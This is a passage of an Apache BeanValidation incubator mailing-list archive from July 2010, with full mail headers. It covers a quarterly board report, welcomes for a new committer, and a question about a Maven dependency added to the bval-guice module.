optimal. I am wondering if we > could borrow some ideas from e.g. Mockito to stay typesafe and > compiler-checked yet avoid the need to write a builder per constraint. > > Thoughts? > > -Matt --00235452eebc9a367d048b341183-- From [email protected] Tue Jul 13 16:15:56 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39843 invoked from network); 13 Jul 2010 16:15:56 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 13 Jul 2010 16:15:56 -0000 Received: (qmail 54503 invoked by uid 500); 13 Jul 2010 16:15:56 -0000 Delivered-To: [email protected] Received: (qmail 54479 invoked by uid 500); 13 Jul 2010 16:15:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54471 invoked by uid 99); 13 Jul 2010 16:15:55 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 16:15:55 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,UNPARSEABLE_RELAY X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO smtp107.prem.mail.ac4.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 13 Jul 2010 16:15:48 +0000 Received: (qmail 97274 invoked from network); 13 Jul 2010 16:15:26 -0000 Received: from drwoods.raleigh.ibm.com ([email protected] with plain) by smtp107.prem.mail.ac4.yahoo.com with SMTP; 13 Jul 2010 09:15:26 -0700 PDT X-Yahoo-SMTP: sCI.ryiswBB7FW.DxjU523c87MI- X-YMail-OSG: muw1eCUVM1mQYPzSYLWvSR3YkODF5JaCmIee71LDk6pOy9c tbv.Km_GeP3_UFKVG0CtPfmMVBYfHtA2Nhyc_YkfCiDoOSuH1cnZAGJz3nxC i96MsbkF3sTcG0IV0qXA5tSGdi6UYgqlZMt6L.Qd0UJe3xkwcTKg8Vcy0rLp GjNCt4NHr1VbhcEWNbXNmPEUWD7qywLFN3Sm2GbpBp4OqKCfvyCUB2pyMNwQ BUvAe7FOWlsfOuhJOuebOIwdnrC_T0ioKDaGzKYGI5GDQKSWTAy3apo7Hmah V1IkihrtmDluWrUkuOYrt4QmuSFCMR0N2xLJgNqqYFngG_jWJ9SveWxor9g- - X-Yahoo-Newman-Property: ymail-3 Message-ID: <[email protected]> Date: Tue, 13 Jul 2010 12:15:26 -0400 From: Donald Woods <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:161.129.204.104) Gecko/20100608 Lightning/1.0b2 Thunderbird/3.1 MIME-Version: 1.0 To: [email protected] Subject: Re: Incubator PMC/Board report for July 2010 ([email protected]) References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 1.1.1 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org There was no feedback, so I've posted it to the Incubator report. Can a mentor review and sign-off? Thanks, Donald On 7/7/10 12:02 PM, Donald Woods wrote: > I've created an initial report on our wiki at - > https://cwiki.apache.org/confluence/display/BeanValidation/2010-07+%28July%29 > > Please review and update as needed. > > > -Donald > > > On 7/1/10 10:00 AM, [email protected] wrote: >> Dear BeanValidation Developers, >> >> This email was sent by an automated system on behalf of the Apache Incubator PMC. >> It is an initial reminder to give you plenty of time to prepare your quarterly >> board report. >> >> The board meeting is scheduled for . The report >> for your podling will form a part of the Incubator PMC report. The Incubator PMC >> requires your report to be submitted one week before the board meeting, to allow >> sufficient time for review. >> >> Please submit your report with sufficient time to allow the incubator PMC, and >> subsequently board members to review and digest. Again, the very latest you >> should submit your report is one week prior to the board meeting. >> >> Thanks, >> >> The Apache Incubator PMC >> >> Submitting your Report >> ---------------------- >> >> Your report should contain the following: >> >> * Your project name >> * A brief description of your project, which assumes no knowledge of the project >> or necessarily of its field >> * A list of the three most important issues to address in the move towards >> graduation. >> * Any issues that the Incubator PMC or ASF Board might wish/need to be aware of >> * How has the community developed since the last report >> * How has the project developed since the last report. >> >> This should be appended to the Incubator Wiki page at: >> >> http://wiki.apache.org/incubator/July2010 >> >> Note: This manually populated. You may need to wait a little before this page is >> created from a template. >> >> Mentors >> ------- >> Mentors should review reports for their project(s) and sign them off on the >> Incubator wiki page. Signing off reports shows that you are following the >> project - projects that are not signed may raise alarms for the Incubator PMC. >> >> Incubator PMC >> >> > From [email protected] Tue Jul 13 17:51:22 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89119 invoked from network); 13 Jul 2010 17:51:22 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 13 Jul 2010 17:51:22 -0000 Received: (qmail 31913 invoked by uid 500); 13 Jul 2010 17:51:22 -0000 Delivered-To: [email protected] Received: (qmail 31875 invoked by uid 500); 13 Jul 2010 17:51:22 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 31867 invoked by uid 99); 13 Jul 2010 17:51:21 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 17:51:21 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27807.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 13 Jul 2010 17:51:14 +0000 Received: (qmail 35482 invoked by uid 60001); 13 Jul 2010 17:49:53 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1279043393; bh=UazrixEViAkWuXQwQRjW6Zafur9eepzF2s8Lc6gloVw=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=Hgr3yPCpumlwQxPZNDQZZzKgEtEDvgdYRoZf4rFV90VmTIQ4uJMMEWhInQYnS8t7ifOE5ZdqQnO+FSmi7pTk8gvY6jdnlYKoCu5el3f9PfuyhOXarACEYTkE+Nhn44079dES6f8iYO4MlWjPzHeA+CjuXcHZxPsBQ5hOcx0UYT4= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=PeS+E5Jv1XiEnNxqlDgpqiSAiKAZZRaaTu/c8tYYhWhg1Jc9WiQXOf+LxB+Ckknm9fjfM2E26V3n9bxqcEGIG5ErtFW1yI/IdKZYd377tQNqQtGDasMOccdwpd0Zf5G6h48Fy545c+ZMsTU30QZ1A9sfyCY7l+2gXDXjKa7kt4U=; Message-ID: <[email protected]> X-YMail-OSG: qXfQWLYVM1mjMMXFPHb8mlX_47_Tbu_EZ73ixj_hW.mPr3j NO76pUDTsTcy9Kau8YAeEx5mn3HuAoPwNNa2H4bOuBeq3Rw_wW4YjLIjR7cU mWl6ZmDVQb_gABmYhS_.Bn_QJ_IzqKUlhwvVvuf1hvPM8CEW9H4SWyzy.5_b hh59ZxZeU5heLuQirJpO9lNLt3dobLI2SMe_Ptyww6cU8tzay9yRRBHeE703 3zn.4uf9zpR_OlYx037KS3MU6xCbNNQ65iknebrl.wrceaOEfebrQtjRDNFA M5dFu63V0zVJPJKTZ7mq3el8DtFbomE..cQ-- Received: from [161.129.204.104] by web27807.mail.ukl.yahoo.com via HTTP; Tue, 13 Jul 2010 17:49:52 GMT X-Mailer: YahooMailClassic/11.2.4 YahooMailWebService/161.129.204.1044457 Date: Tue, 13 Jul 2010 17:49:52 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org And also here a big fat welcome on board David!=0A=0ALieGrue,=0Astrub=0A=0A= --- On Thu, 7/8/10, Carlos Vara <[email protected]> wrote:=0A=0A> From: C= arlos Vara <[email protected]>=0A> Subject: Re: [ANNOUNCE] Welcome David = Jencks as a new Committer=0A> To: [email protected]=0A> Date: T= hursday, July 8, 2010, 5:04 PM=0A> Congrats and welcome to the team=0A> Dav= id!=0A> =0A> On Thu, Jul 8, 2010 at 5:48 PM, Matt Benson <[email protected].= com>=0A> wrote:=0A> =0A> > Congratulations, David!=A0 -Matt=0A> >=0A> > On = Jul 8, 2010, at 11:43 AM, Donald Woods wrote:=0A> >=0A> > > The BVAL PPMC r= ecently extended committer karma=0A> to David and he has=0A> > > accepted.= =A0 Welcome aboard David!=0A> > >=0A> > > -Donald=0A> >=0A> >=0A> =0A=0A=0A= From [email protected] Tue Jul 13 17:51:54 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 94165 invoked from network); 13 Jul 2010 17:51:53 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 13 Jul 2010 17:51:53 -0000 Received: (qmail 32076 invoked by uid 500); 13 Jul 2010 17:51:53 -0000 Delivered-To: [email protected] Received: (qmail 32036 invoked by uid 500); 13 Jul 2010 17:51:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 32028 invoked by uid 99); 13 Jul 2010 17:51:53 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 17:51:53 +0000 X-ASF-Spam-Status: No, hits=0.7 required=10.0 tests=FREEMAIL_FROM,RCVD_IN_DNSWL_NONE,SPF_NEUTRAL,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO web27802.mail.ukl.yahoo.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Tue, 13 Jul 2010 17:51:45 +0000 Received: (qmail 21215 invoked by uid 60001); 13 Jul 2010 17:51:24 -0000 DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=yahoo.de; s=s1024; t=1279043484; bh=EJPSw9TO9lsNX2XEUiGY+gKw/54wp7NpIizrsXVq320=; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=IyZkc/JTC91zNuSeTfUx98YNesXboyrqUN5Az5/Rpt/4ma+GEyZ0ONqIdC3UFoJUBvkNgLZLOQJJ4B9q/E6tAiM6oGzpfHIexsF7F4M5TWS0Z6DX8pUxMRGv2jEXqzKUIddLcF3f37/tduV/4FG+UYjTkF6jAaYSRSfJgzaKKvk= DomainKey-Signature:a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.de; h=Message-ID:X-YMail-OSG:Received:X-Mailer:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=ZN4PSSsKPsFaq71j2ThesJAeW6rOSdkYAc91rq5WhiPtdXfBSvFhn33EytlZAA75S1N586s+yQKaob0zc93evYPsALfP6Y1qnlHZm4cHZGKiXELDgjBwGaBQv0GNKEok42PgtH9zFA5+Rl/lgJVYw3oJ6dFfRYwpRAixbZLC8Rs=; Message-ID: <[email protected]> X-YMail-OSG: voHKFAoVM1lNpN2Y84dMC8J7JuCzRN842f3L.MipIl2ESDT aWffCtbL0loOAa.OOS5dDMn2aBDwUrWnXsB_jqXRsRcAkp8.Xa57rNJzEBbm rvRK.chc_ElE97CcaeN9shhWlwGhUoRT3XTwy04M3iZdfYDJchNrHjlpbQ24 Mo1S8ycC5snhZrU8tY3YS0x_aWaL699D3.myGiBS.uIqwZSy4.TMnDxPdGkO 1aWWuEliNLczhKiZb2ZvGOWLoQZaQpQ8U2.pVzL25fSxoM8PWE_DrypHWzJp TZq40ZxRVVUTGgM4DqCetJX.EH0eRxlWmQQ-- Received: from [161.129.204.104] by web27802.mail.ukl.yahoo.com via HTTP; Tue, 13 Jul 2010 17:51:24 GMT X-Mailer: YahooMailClassic/11.2.4 YahooMailWebService/161.129.204.1044457 Date: Tue, 13 Jul 2010 17:51:24 +0000 (GMT) From: Mark Struberg <[email protected]> Subject: Re: Incubator PMC/Board report for July 2010 ([email protected]) To: [email protected] In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org yes, does look good :)=0A=0ALieGrue,=0Astrub=0A=0A--- On Tue, 7/13/10, Dona= ld Woods <[email protected]> wrote:=0A=0A> From: Donald Woods <dwoods@apach= e.org>=0A> Subject: Re: Incubator PMC/Board report for July 2010 (bval-dev@= incubator.apache.org)=0A> To: [email protected]=0A> Date: Tuesd= ay, July 13, 2010, 4:15 PM=0A> There was no feedback, so I've posted=0A> it= to the Incubator report.=0A> =0A> Can a mentor review and sign-off?=0A> = =0A> Thanks,=0A> Donald=0A> =0A> =0A> On 7/7/10 12:02 PM, Donald Woods wrot= e:=0A> > I've created an initial report on our wiki at -=0A> > https://cwik= i.apache.org/confluence/display/BeanValidation/2010-07+%28July%29=0A> > =0A= > > Please review and update as needed.=0A> > =0A> > =0A> > -Donald=0A> > = =0A> > =0A> > On 7/1/10 10:00 AM, [email protected]=0A> wrote:=0A> >> Dea= r BeanValidation Developers,=0A> >>=0A> >> This email was sent by an automa= ted system on=0A> behalf of the Apache Incubator PMC.=0A> >> It is an initi= al reminder to give you plenty of=0A> time to prepare your quarterly=0A> >>= board report.=0A> >>=0A> >> The board meeting is scheduled for . The repor= t =0A> >> for your podling will form a part of the Incubator=0A> PMC report= . The Incubator PMC =0A> >> requires your report to be submitted one week= =0A> before the board meeting, to allow =0A> >> sufficient time for review.= =0A> >>=0A> >> Please submit your report with sufficient time to=0A> allow = the incubator PMC, and =0A> >> subsequently board members to review and dig= est.=0A> Again, the very latest you =0A> >> should submit your report is on= e week prior to the=0A> board meeting.=0A> >>=0A> >> Thanks,=0A> >>=0A> >> = The Apache Incubator PMC=0A> >>=0A> >> Submitting your Report=0A> >> ------= ----------------=0A> >>=0A> >> Your report should contain the following:=0A= > >>=0A> >>=A0 * Your project name=0A> >>=A0 * A brief description of your = project, which=0A> assumes no knowledge of the project=0A> >>=A0 =A0 or nec= essarily of its field=0A> >>=A0 * A list of the three most important issues= =0A> to address in the move towards =0A> >>=A0 =A0 graduation.=0A> >>=A0 * = Any issues that the Incubator PMC or ASF=0A> Board might wish/need to be aw= are of=0A> >>=A0 * How has the community developed since the=0A> last repor= t=0A> >>=A0 * How has the project developed since the=0A> last report.=0A> = >>=A0 =0A> >> This should be appended to the Incubator Wiki page=0A> at:=0A= > >>=0A> >>=A0=A0=A0http://wiki.apache.org/incubator/July2010=0A> >>=0A> >>= Note: This manually populated. You may need to=0A> wait a little before th= is page is=0A> >>=A0 =A0 =A0=A0=A0created from a=0A> template.=0A> >>=0A> >= > Mentors=0A> >> -------=0A> >> Mentors should review reports for their pro= ject(s)=0A> and sign them off on the =0A> >> Incubator wiki page. Signing o= ff reports shows=0A> that you are following the =0A> >> project - projects = that are not signed may raise=0A> alarms for the Incubator PMC.=0A> >>=0A> = >> Incubator PMC=0A> >>=0A> >>=0A> > =0A> =0A=0A=0A From [email protected] Tue Jul 13 18:27:41 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 4752 invoked from network); 13 Jul 2010 18:27:41 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 13 Jul 2010 18:27:41 -0000 Received: (qmail 99535 invoked by uid 500); 13 Jul 2010 18:27:41 -0000 Delivered-To: [email protected] Received: (qmail 99493 invoked by uid 500); 13 Jul 2010 18:27:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 99485 invoked by uid 99); 13 Jul 2010 18:27:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 18:27:40 +0000 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=FREEMAIL_FROM,HTML_MESSAGE,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 18:27:34 +0000 Received: by gxk1 with SMTP id 1so3827448gxk.6 for <[email protected]>; Tue, 13 Jul 2010 11:26:22 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:mime-version:received:in-reply-to :references:from:date:message-id:subject:to:content-type; bh=+WIFAsGdkIzHlHOVhGC+5dPZociiaFjAUhMDWIyciQ0=; b=wJ8YgNNb7CJhYnW2n6KGqZYhBhOvT4Va6KdKExbFGWjo1OQiRjjfgM9FhO0dpfjGas lk/FAJq2RfsH9IEF0MHTYu34lfPOhSZEYhVBrN7u53R3PK5/GCKIK5kjsIkoNm7cLsGw bM1nGSzGvzfefQbqYTR1a7oT7YeonZ3vy/V9g= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:from:date:message-id:subject:to :content-type; b=w0bBOwCnvc6D3bJ4htCGS2dRy9txxxZ19jItk7vbKrM5LW6Ve4NMYt0zPQJZrlJy38 dbct9MVNjnelnz1sVHLGA4ykZGavT2jaWo6wg70u/EUJj2eyVEGW9oFGLoVUvmILBqbz XPVKyK/TyKsdQWRrATw3bBFy9CNpvwKJJ6BQ0= Received: by 161.129.204.104 with SMTP id q35mr6904849yba.210.1279045577675; Tue, 13 Jul 2010 11:26:17 -0700 (PDT) MIME-Version: 1.0 Received: by 161.129.204.104 with HTTP; Tue, 13 Jul 2010 11:25:57 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> From: Gerhard Petracek <[email protected]> Date: Tue, 13 Jul 2010 20:25:57 +0200 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer To: [email protected] Content-Type: multipart/alternative; boundary=000e0cd5b9a04f6516048b4901ce X-Virus-Checked: Checked by ClamAV on apache.org --000e0cd5b9a04f6516048b4901ce Content-Type: text/plain; charset=ISO-8859-1 welcome! regards, gerhard http://www.irian.at Your JSF powerhouse - JSF Consulting, Development and Courses in English and German Professional Support for Apache MyFaces 2010/7/13 Mark Struberg <[email protected]> > And also here a big fat welcome on board David! > > LieGrue, > strub > > --- On Thu, 7/8/10, Carlos Vara <[email protected]> wrote: > > > From: Carlos Vara <[email protected]> > > Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer > > To: [email protected] > > Date: Thursday, July 8, 2010, 5:04 PM > > Congrats and welcome to the team > > David! > > > > On Thu, Jul 8, 2010 at 5:48 PM, Matt Benson <[email protected]> > > wrote: > > > > > Congratulations, David! -Matt > > > > > > On Jul 8, 2010, at 11:43 AM, Donald Woods wrote: > > > > > > > The BVAL PPMC recently extended committer karma > > to David and he has > > > > accepted. Welcome aboard David! > > > > > > > > -Donald > > > > > > > > > > > > --000e0cd5b9a04f6516048b4901ce-- From [email protected] Tue Jul 13 18:34:17 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47378 invoked from network); 13 Jul 2010 18:34:17 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 13 Jul 2010 18:34:17 -0000 Received: (qmail 10714 invoked by uid 500); 13 Jul 2010 18:34:17 -0000 Delivered-To: [email protected] Received: (qmail 10686 invoked by uid 500); 13 Jul 2010 18:34:16 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 10678 invoked by uid 99); 13 Jul 2010 18:34:16 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 18:34:16 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ey0-f175.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 13 Jul 2010 18:34:11 +0000 Received: by eyf5 with SMTP id 5so903453eyf.6 for <[email protected]>; Tue, 13 Jul 2010 11:33:50 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=AUp/Z9TQPXkRevvwIP6fKRp5iztrG0boAA+MsHkaTmI=; b=aCMhB7NteHHRruroGsRw+vT1N2NBdnU2vNHe4OZRVHemweYCWa47abFIRBzgBljSJR FDuyFuwY3DL6Y8gicyIwqpZzfvnkgP9MYiIhj11oU015sZWWqp/BPKauZizjwPlmQ1Xb x4cIQbjMByHjNPeLbKvRaK4Q6si/CJQDvb+j8= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=eesYLnEeCAe6JJy0HCO59sYWKeMuE6Ve0QtJbNyXCpJjXFqNRZHUfw0aP/tvcXRVbo UswIg2wXDBEvcv3iwNoLxm+uPfJ4gdcM1ONwWSoy41D9aDmiMsfn9DslIEd490thI/DA GYmIfjkYWR9mu3pvWWrzHQvx1WzHGl1UhfjQM= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id p19mr11620275ebp.66.1279046030680; Tue, 13 Jul 2010 11:33:50 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 13 Jul 2010 11:33:50 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> Date: Tue, 13 Jul 2010 21:33:50 +0300 Message-ID: <[email protected]> Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer From: Mohammad Nour El-Din <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Actually I want to congratulate us of having David Jencks on board, he is a real guru. Welcome aboard David :). On Tue, Jul 13, 2010 at 9:25 PM, Gerhard Petracek <[email protected]> wrote: > welcome! > > regards, > gerhard > > http://www.irian.at > > Your JSF powerhouse - > JSF Consulting, Development and > Courses in English and German > > Professional Support for Apache MyFaces > > > > 2010/7/13 Mark Struberg <[email protected]> > >> And also here a big fat welcome on board David! >> >> LieGrue, >> strub >> >> --- On Thu, 7/8/10, Carlos Vara <[email protected]> wrote: >> >> > From: Carlos Vara <[email protected]> >> > Subject: Re: [ANNOUNCE] Welcome David Jencks as a new Committer >> > To: [email protected] >> > Date: Thursday, July 8, 2010, 5:04 PM >> > Congrats and welcome to the team >> > David! >> > >> > On Thu, Jul 8, 2010 at 5:48 PM, Matt Benson <[email protected]> >> > wrote: >> > >> > > Congratulations, David! =A0-Matt >> > > >> > > On Jul 8, 2010, at 11:43 AM, Donald Woods wrote: >> > > >> > > > The BVAL PPMC recently extended committer karma >> > to David and he has >> > > > accepted. =A0Welcome aboard David! >> > > > >> > > > -Donald >> > > >> > > >> > >> >> >> >> > --=20 Thanks - Mohammad Nour =A0 Author of (WebSphere Application Server Community Edition 2.0 User Guid= e) =A0 http://www.redbooks.ibm.com/abstracts/sg247585.html - LinkedIn: http://www.linkedin.com/in/mnour - Blog: http://tadabborat.blogspot.com ---- "Life is like riding a bicycle. To keep your balance you must keep moving" - Albert Einstein "Writing clean code is what you must do in order to call yourself a professional. There is no reasonable excuse for doing anything less than your best." - Clean Code: A Handbook of Agile Software Craftsmanship "Stay hungry, stay foolish." - Steve Jobs From [email protected] Thu Jul 15 08:44:36 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 50722 invoked from network); 15 Jul 2010 08:44:36 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 15 Jul 2010 08:44:36 -0000 Received: (qmail 27368 invoked by uid 500); 15 Jul 2010 08:44:36 -0000 Delivered-To: [email protected] Received: (qmail 27318 invoked by uid 500); 15 Jul 2010 08:44:35 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <bval-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27310 invoked by uid 99); 15 Jul 2010 08:44:34 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 08:44:34 +0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests=FREEMAIL_FROM,SPF_PASS,T_TO_NO_BRKTS_FREEMAIL X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-ew0-f47.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 15 Jul 2010 08:44:27 +0000 Received: by ewy7 with SMTP id 7so154967ewy.6 for <[email protected]>; Thu, 15 Jul 2010 01:44:07 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:received:received:in-reply-to :references:date:message-id:subject:from:to:content-type :content-transfer-encoding; bh=MvKvVa/pWiDSFqwqQ+miSceQOWgZxmHty342abvlqvs=; b=VvDjdRrxbcd4Uwcxo/9aAoXRVQ8OrEsXIx1muG2LTgqpldJ1N2hvC8yRMH92FSD6Pz Vefr3BRlobHp/cEj8C0wnvkXb4y8jfTgjjPCd1bfLFsAiPzSHBu+4Nm69/ewea5TuJVg uZhU8P+HdAY//lArfPFqTY1rPD4NB1TnBBOC4= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:in-reply-to:references:date:message-id:subject:from:to :content-type:content-transfer-encoding; b=WMwC/+kQSDjIpvFer2c/aFPNTRAU1WKB3khVuAa3xarHcRbQgxe2U+4XkFSxo51bB9 tFgdWXZ6c+nFO0QH+fabMyg1+CmIJIxDuezg2vj6xv9J/wcJiYgLtaCyaiVpWZ4pvL71 MG1q6Sgz1ESju4QNFs7vXadDKvHbBAuoaE5+w= MIME-Version: 1.0 Received: by 161.129.204.104 with SMTP id b10mr2349215ebd.98.1279183447186; Thu, 15 Jul 2010 01:44:07 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Thu, 15 Jul 2010 01:44:07 -0700 (PDT) In-Reply-To: <[email protected]> References: <[email protected]> Date: Thu, 15 Jul 2010 10:44:07 +0200 Message-ID: <[email protected]> Subject: Re: svn commit: r962625 - /incubator/bval/trunk/bval-guice/pom.xml From: Simone Tripodi <[email protected]> To: [email protected] Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi Donald, I'm sure at 100% I missed something in the discussion list, but the guice module doesn't use the xstream module features at all, can you at least point me the discussion why this module is required? Thanks in advance! :) Simo http://people.apache.org/~simonetripodi/ http://www.99soft.org/ On Fri, Jul 9, 2010 at 8:31 PM, <[email protected]> wrote: > Author: dwoods > Date: Fri Jul =C2=A09 18:31:49 2010 > New Revision: 962625 > > URL: http://svn.apache.org/viewvc?rev=3D962625&view=3Drev > Log: > BVAL-77 Add bval-xstream depend for bval-guice > > Modified: > =C2=A0 =C2=A0incubator/bval/trunk/bval-guice/pom.xml > > Modified: incubator/bval/trunk/bval-guice/pom.xml > URL: http://svn.apache.org/viewvc/incubator/bval/trunk/bval-guice/pom.xml= ?rev=3D962625&r1=3D962624&r2=3D962625&view=3Ddiff > =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D= 